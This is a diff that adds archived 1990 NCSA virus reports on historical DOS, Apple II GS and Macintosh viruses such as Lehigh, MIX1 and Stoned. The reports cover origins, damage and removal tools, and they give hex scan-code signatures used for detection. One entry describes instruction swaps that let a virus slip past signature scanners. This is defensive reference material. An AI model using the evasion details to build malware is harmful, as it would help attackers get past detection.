309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa082.txt b/textfiles.com/virus/NCSA/ncsa082.txt new file mode 100644 index 00000000..699575a5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa082.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Jerusalem-E + + +Host Machine: PC compatibles. + +Derived from: Jerusalem-D. + + This is identical to the Jerusalem-D variety except the activation +is any Friday the 13th after 1992. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa083.txt b/textfiles.com/virus/NCSA/ncsa083.txt new file mode 100644 index 00000000..0c195e17 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa083.txt 
@@ -0,0 +1,97 @@ + Ŀ + VIRUS REPORT + Joker + + +Synonyms: Jocker + +Date of Origin: December, 1989. + +Place of Origin: Poland. + +Host Machine: PC compatibles. + +Host Files: Non resident. Infects EXE files. + +OnScreen Symptoms: Infected programs display bogus error messages. + +Nature of Damage: Damages program files. + +Detected by: Scanv57+, Pro-Scan. + +Removed by: CleanUp, Scan/D, or delete infected files. + + The Joker was isolated in Poland in December, 1989. This virus is a +generic .EXE file infector, and is a poor replicator (ie. it does not +quickly infect other files). + + Infected programs will display bogus error messages and comments, +which cam be found in the infected files at the beginning of the viral +code. Some of the messages and comments include: + +Incorrect DOS version + +Invalid Volume ID Format failure + +Please put a new disk into drive A: + +End of input file + +END OF WORKTIME. TURN SYSTEM OFF! + +Divide Overflow + +Water detect in Co-processor + +I am hungry! Insert HAMBURGER into drive A: + +NO SMOKING, PLEASE! + +Thanks. + +Don't beat me !! + +Don't drink and drive. + +Another cup of cofee ? + +OH, YES! + +Hard Disk head has been destroyed. Can you borrow me your one? + +Missing light magenta ribbon in printer! + +In case mistake, call GHOST BUSTERS + +Insert tractor toilet paper into printer. + + This virus may also alter .DBF files, adding messages to them. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa084.txt b/textfiles.com/virus/NCSA/ncsa084.txt new file mode 100644 index 00000000..64ff243f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa084.txt 
@@ -0,0 +1,55 @@ + Ŀ + VIRUS REPORT + Jork Virus + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Derived from: Shoe_virus (Ashar). + + This virus is exactly the same as the Shoe_virus (Ashar) in +operation. It was patched to replace offset 0202H, which reads as +follows in the Shoe virus: + +(c) 1986 Brain & Amjads (pvt) Ltd + + with + +(c) 1986 Jork & Amjads (pvt) Ltd + + Another patch the author made to the Shoe_virus was to reduce the +identifying text at offset 0010H to "Welcome to the Dungeon (c) 1986 +Brain". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa085.txt b/textfiles.com/virus/NCSA/ncsa085.txt new file mode 100644 index 00000000..aaabc35b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa085.txt 
@@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + June 16th Virus + + +Synonyms: Pretoria virus + +Date of Origin: April, 1990 + +Place of Origin: South Africa. + +Host Machine: PC compatibles. + +Host Files: COM files including COMMAND.COM. Non-resident. + +OnScreen Symptoms: A large hard disk may slow down during infection. + +Increase in Size of Infected Files: 879 bytes. + +Nature of Damage: Infects all COM files on the hard disk when an infected +program is first run. Erases all entries in root directory on any June +16. All FAT entries are replaced with tye word "ZAPPED". + +Scan Code: encrypted. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa086.txt b/textfiles.com/virus/NCSA/ncsa086.txt new file mode 100644 index 00000000..62b74f65 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa086.txt 
@@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Kennedy Virus + + +Synonyms: Dead Kennedy + +Date of Origin: April, 1990 + +Host Machine: PC compatibles. + +Host Files: COM files other than COMMAND.COM + +Increase in Size of Infected Files: 333 bytes. + +Nature of Damage: not destructive. + +Removed by: delete any infected files. + +Scan Code: In the virus, you can find the following text strings: +"\command.com" and "The Dead Kennedys". + + This virus activates on three dates: June 6, November 18, and +November 22. November 22 is the date of the assassination of John F. +Kennedy. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa087.txt b/textfiles.com/virus/NCSA/ncsa087.txt new file mode 100644 index 00000000..063750c0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa087.txt 
@@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Korea Virus + + +Synonyms: LBC boot. + +Date of Origin: March, 1990 + +Place of Origin: Seoul, Korea. + +Host Machine: PC compatibles. + +Host Files: boot sectors of 360K floppies. Memory resident. + +Increase in Size of Infected Files: n/a. + +Detected by: Scanv61+. + +Removed by: M-Disk, or DOS SYS command. + + In its current version, this virus does nothing but spread. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa088.txt b/textfiles.com/virus/NCSA/ncsa088.txt new file mode 100644 index 00000000..4457dd29 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa088.txt 
@@ -0,0 +1,133 @@ + Ŀ + VIRUS REPORT + Lehigh + + +Date of Origin: late 1987. + +Place of Origin: Lehigh University, Pennsylvania. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM. + +Increase in Size of Infected Files: overwrites files. + +Nature of Damage: Corrupts program or overlay files. Overwrites the FAT +and boot sector after infecting four floppies. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, or use MDisk and replace COMMAND.COM with a clean +copy, or use F-Prot. + +Scan Code: 50 53 80 FC 4B 74 08 80 FC 4E 74 03 E9 77 01 8B DA 80 7F 01 3A +75 05 8A 07 EB 07. You can also search at offset 01CH for B4 19 CD 44 04 +61 1E 51 52 57. + +History: This is a COMMAND.COM infector that first surfaced at Lehigh +University in late 1987. It is one of the best known of viruses, and +widely discussed and analyzed. + +Description of Operation: Infects only COMMAND.COM, where it overwrites +the stack space. If a disk which contains an uninfected copy of +COMMAND.COM is accessed, that copy is also infected. A count of +infections is kept within each copy of the virus, and when this count +reaches 4, every disk (including hard disks) currently in the computer +is trashed by overwriting the initial tracks (boot sector & FAT). +Infection changes the date and time of the infected file. If a floppy +with an uninfected COMMAND.COM is write-protected, there will be a +"WRITE PROTECT ERROR" message from DOS. + + I have reprinted below the warning that Kenneth van Wyk distributed +on this virus. + + "WARNING: MS-DOS COMMAND.COM "virus" program will +reformat your disks!! + + "Last week, some of our student consultants discovered a virus +program that's been spreading rapidly throughout Lehigh University. I +thought I'd take a few minutes and warn as many of you as possible +about this program since it has the chance of spreading much farther +than just our University. 
We have no idea where the virus started, but +some users have told me that other universities have recently had +similar problems. + + "The virus: the virus itself is contained within the stack space of +COMMAND.COM. When a PC is booted from an infected disk, all a +user need do to spread the virus is to access another disk via TYPE, +COPY, DIR, etc. If the other disk contains COMMAND.COM, the virus +code is copied to the other disk. Then, a counter is incremented on the +parent. When this counter reaches a value of 4, any and every disk in +the PC is erased thoroughly. The boot tracks are nulled, as are the FAT +tables, etc. All Norton's horses couldn't put it back together again... :-) +This affects both floppy and hard disks. Meanwhile, the four children +that were created go on to tell four friends, and then they tell four +friends, and so on, and so on. + + "Detection: while this virus appears to be very well written, the +author did leave behind a couple footprints. First, the write date of the +COMMAND.COM changes. Second, if there's a write protect tab on an +uninfected disk, you will get a WRITE PROTECT ERROR... So, boot up +from a suspected virus'd disk and access a write protected disk - if an +error comes up, then you're sure. Note that the length of +COMMAND.COM does not get altered. + + "I urge anyone who comes in contact with publicly accessible disks +to periodically check their own disks. Also, exercise safe computing - +always wear a write protect tab. + + "This is not a joke. A large percentage of our public site disks has +been gonged by this virus in the last couple days." + + The Lehigh original virus has been sporadically reported at dozens +of installations outside of the university for over a year. It is not a +particulary successful replicator <197> probably because of the +extremely short activation fuse - and it is difficult to detect and +report because there are few symptoms prior to activation. 
But there +should certainly be no surprise that it's in the public domain. + + John McAfee has written: "The belief that viruses can be contained by +early counter-action is belied by the Lehigh University experience. I +have spoken to a number of individuals at the University who belived +that the virus had somehow been contained because "no copies of the +virus were distributed to outside organizations". This assumed, of +course, that the original virus writer gave up after being foiled at +Lehigh and did not insert the virus at any other location, and that all +copies of the virus at Lehigh had indeed been accounted for. The first +issue rests solely in the hands of the perpetrator and is beyond any +containment controls. The second issue relies on an error-free +containment process - allowing no possibility for overlooking, losing or +mistaking an infected diskette. In any case, the Lehigh virus was by no +means contained. I received a copy, as did virtually every virus +researcher, in mid-1988, and infection reports issued throughout the +year from universities, corporations and individual computer users." + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. 
+ + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa089.txt b/textfiles.com/virus/NCSA/ncsa089.txt new file mode 100644 index 00000000..f0fa9ee7 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa089.txt 
@@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Lehigh-2 + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM only. + +Increase in Size of Infected Files: overwrites files. + +Nature of Damage: Corrupts program or overlay files. Overwrites the FAT +and boot sector after infecting four floppies. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, or use MDisk and replace COMMAND.COM with a clean +copy, or use F-Prot. + +Derived from: Lehigh virus. + +Scan Code: 50 53 80 FC 4B 74 08 80 FC 4E 74 03 E9 77 01 8B DA 80 7F 01 3A +75 05 8A 07 EB 07. + + A version of the Lehigh virus modified to retain its infection +counter in RAM. After 10 infections, it corrupts the boot sector and +FATs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa090.txt b/textfiles.com/virus/NCSA/ncsa090.txt new file mode 100644 index 00000000..bfa84fdb --- /dev/null 
+++ b/textfiles.com/virus/NCSA/ncsa090.txt 
@@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Lisbon virus + + +Date of Origin: November, 1989. + +Place of Origin: Lisbon, Portugal. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Nature of Damage: Corrupts one out of eight COM programs by overwriting. + +Detected by: Scanv49+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Vienna + + This virus was discovered by Jean Luz, an NCSA member in Lisbon, +Portugal, in November, 1989. It infects COM files and increases the size +of infected programs by 648 bytes. It destroys 1 out of 8 infected +programs by overwriting "@AIDS" on top of the first five bytes of the +infected program. + + The virus is very similar to Vienna, except that almost every word in +the virus has been shifted 1-2 bytes in order to avoid virus +identification/detection programs which could identify the Vienna +virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. 
+ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa091.txt b/textfiles.com/virus/NCSA/ncsa091.txt new file mode 100644 index 00000000..c378933f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa091.txt 
@@ -0,0 +1,69 @@ + Ŀ + VIRUS REPORT + LodeRunner + + +Synonyms: Load Runner, Apple II GS Virus + +Date of Origin: July, 1989. + +Place of Origin: France. + +Host Machine: Apple II GS. + +Host Files: Boot block virus + +Increase in Size of Infected Files: n/a + +Nature of Damage: Erases boot blocks of disk in slot 5, drive 1. No +files are damaged. + + The damage done by this virus is minimal --it destroys only the boot +blocks of a 3.5" disk (5.25" disks and hard disks seem to be immune), +leaving all the files and directories intact (it can, however, render +some copy-protected games unusable). LOAD RUNNER has a finite life-span +built in -- at the same time it starts damaging, it also stops +propagating, and being a boot block virus, it destroys copies of itself +when it destroys the boot blocks. + + Virus copies itself to $E1/BC00 thru $E1/BFFF. Virus resides in the +boot blocks of a 3.5" disk. Copies itself to $E1/BC00 when disk is +booted. Copies itself to disk in slot 5, drive 1 when +CONTROL-APPLE-RESET is pressed. Propagation routine gains control by +patching undocumented system vector in Memory Manager. Original boot +blocks are not saved --virus contains code to emulate standard boot +process. Infects disks in slot 5, drive 1 only. Infection of disks +occurs when CONTROL-APPLE-RESET is pressed. Infection of host machine +occurs when an infected disk is booted. + + Triggered by any date between Oct. 1 and Dec. 31 inclusive, of any +year. Damage occurs when an infected disk is booted. If damage occurs, +further infection will not occur. (Note that the damage process wipes +the virus off of the infected disk.) + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. 
+ + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa092.txt b/textfiles.com/virus/NCSA/ncsa092.txt new file mode 100644 index 00000000..f67ad444 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa092.txt 
@@ -0,0 +1,75 @@ + Ŀ + VIRUS REPORT + MacMag + + +Synonyms: Peace virus. + +Date of Origin: February, 1988. + +Place of Origin: Montreal, Canada. + +Host Machine: Macintosh. + + MacMag may hold the record for the virus that achieved the greatest +notoriety in the shortest period of time. Thousands of machines were +infected in less than a month! A Macintosh virus, it was planted by +Richard Brandow, publisher of MacMag, a Canadian Macintosh magazine. +The message it displayed was "Richard Brandow, publisher of MacMag, and +its entire staff would like to take the opportunity to convey their +universal message of peace to all Macintosh users around the world." The +"universal message of peace" flashed on the screens of thousands of +Macintosh owners on March 2, 1988, did no other damage, then erased its +own instructions. + + The author, Drew Davidson, "thought we'd release it and it would be +kind of neat." + + This was probably the first virus to find its way into commercial +software. Richard Brandow, a collaborator with Davidson and publisher +of a Canadian computer magazine, distributed the virus with game +software called "Mr. Potato Head" at a February, 1988 meeting of the +Montreal Macintosh users group. Marc Canter, who was speaking at the +meeting, worked for MacroMind Inc. of Chicago, a firm doing consulting +work for Aldus. He brought the game home, tried it on his Mac, then began +to review software to be shipped to Aldus. The virus infected the disk +sent to Seattle, which was reproduced. About 3,000 to 5,000 copies of an infected Aldus +Freehandteaching disk were made with a disk duplicating machine, then +shipped to computer stores around the country. Aldus recalled all of the +copies. + + MacMag can be ignored. If there is still a copy left, it will destroy +itself after displaying its message. Nevertheless, it can be detected +and killed with Disinfectant. 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa093.txt b/textfiles.com/virus/NCSA/ncsa093.txt new file mode 100644 index 00000000..0cfae657 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa093.txt 
@@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Madonna + + +Place of Origin: Brazil. + +Host Machine: PC compatibles. + + While Madonna sings in your video, you lose your disk. Reported in +Brazil. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa094.txt b/textfiles.com/virus/NCSA/ncsa094.txt new file mode 100644 index 00000000..2d889008 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa094.txt 
@@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Mailson + + +Place of Origin: Brazil. + +Host Machine: PC compatibles. + + Produces an inversion of characters on the screen and and printer. +Named after a Brazilian politician. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa095.txt b/textfiles.com/virus/NCSA/ncsa095.txt new file mode 100644 index 00000000..3bec8937 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa095.txt 
@@ -0,0 +1,130 @@ + Ŀ + VIRUS REPORT + MIX1 + + +Synonyms: MIX/1 + +Date of Origin: First reported on August 22, 1989. + +Place of Origin: First detected in Israel. May have been written +elsewhere. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files larger than 8K only in +one version, 16K in another version. + +OnScreen Symptoms: You will see a bouncing ball after a crash, which will +occur after the sixth infection. (A variant will not crash the system.) + +Increase in Size of Infected Files: 1618 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv37+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, Virus Buster, or F-Prot. + +Derived from: Icelandic-1. + +Scan Code: "MIX1" will be the last four bytes of any infected EXE. + + MIX1 is a variant of the Icelandic-1 virus, like the Saratoga. The +Icelandic virus was first detected in June, 1989, disassembled a week +later, and the disassembly was made available around the beginning of +July. The MIX1 virus appeared on several BBSs in Israel on August 22, and +may have been written in any country, and then sent via modem to Israeli +boards. + + The virus is put at the end of the .EXE file and the header is changed +to point to the virus. Infected files can be manually identified by a +characteristic "MIX1" always being the last 4 bytes of an infected file. +Using Debug, if byte 0:33C equals 77h, then the MIX1 virus is in memory. +EXE file execution through interrupt 21h service 4bh triggers the virus. +The infected .EXE files grow by 1618-1634 bytes, depending on its +original size. It will not infect files smaller than 8K. Once an infected +program is run, the virus occupies 2,048 bytes of memory. + + Some peculiarities include: + +* All output through vectors 14h and 17h -- the serial and parallel + ports -- is garbled. + +* The NumLock key/light stays on. 
+ +* After the 6th infection, booting may crash the computer due to a bug, + and a bouncing ball may appear on the monitor. + +* Memory allocation is done through direct MCB control. + +* It does not allocate stack space, and therefore makes some files + unusable. + +* It infects only files which are bigger than 16K, which makes + disassembly very hard. + + The modifications to Icelandic I appear to be intended to fool virus +detection programs. The changes include replacing instructions with +other equivalent ones. For example, + +XOR AX,AX + + has been replaced with: + +MOV AX,0000 + + and + +MOV ES,AX + + has been replaced with: + +PUSH AX + +POP ES + + Also, NOP instructions have been inserted in several places, +including inside the identification strings used by VIRUSCAN and most +other similar programs. This seems to be a response by virus writers to +anti-virus programs that look for infection by using identification +strings. This method has been used in the '286 variant of the Ping-Pong +virus. + + Apart from these changes, parts of the virus are almost identical to +other variants of the Icelandic virus. In the installation part, the +code to check INT 13 has been removed (as in Saratoga and Icelandic-2). + + In a variant, the infection routine has been modified to infect every +file (instead of every tenth program run), and to not infect a program +unless it is at least 16K long. A variant of the virus will not crash the +system. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. 
This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa096.txt b/textfiles.com/virus/NCSA/ncsa096.txt new file mode 100644 index 00000000..a555ea40 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa096.txt 
@@ -0,0 +1,85 @@ + Ŀ + VIRUS REPORT + New Zealand Virus + + +Synonyms: Stoned Virus, Australian Virus, Hawaii, Marijuana, San Diego +virus, Smithsonian virus. + +Date of Origin: early 1988. + +Place of Origin: Wellington, New Zealand. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of 360K floppy disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Scan Code: 1E 50 80 FC 02 72 17 80 FC 04 73 12 0A D2 75 0E 33 C0 8E D8 A0 +3F 04 A8 01 75 03 E8 07 00. You can also search at offset 045H for B8 01 +02 0E 07 BB 00 02 B9 01. + +History: This virus was first reported in Wellington, New Zealand in +early 1988. + +Description of Operation: This virus consists of a boot sector only. It +infects any disk inserted in a drive after it becomes activated during a +boot, and it occupies 1K of memory. The original boot sector is held in +track zero, head one, sector three on a floppy disk, and track zero, head +zero, sector two on a hard disk. The boot sector contains two character +strings: "Your PC is now Stoned!" and "LEGALISE MARIJUANA!". The first +of these messages is only displayed one in eight times when booting from +an infected floppy, the second is unreferenced. In some variations, the +message is displayed on every 32nd boot. + + In the original version of this virus, only 360 KB 5 1/4" floppies +were infected. While the original version was unable to infect a hard +disk, other versions (such as New Zealand B) are capable of doing so. + + The virus can (unintentionally) trash 1.2 Mb floppies if they have +more than 32 files, and trashes about 5% of hard 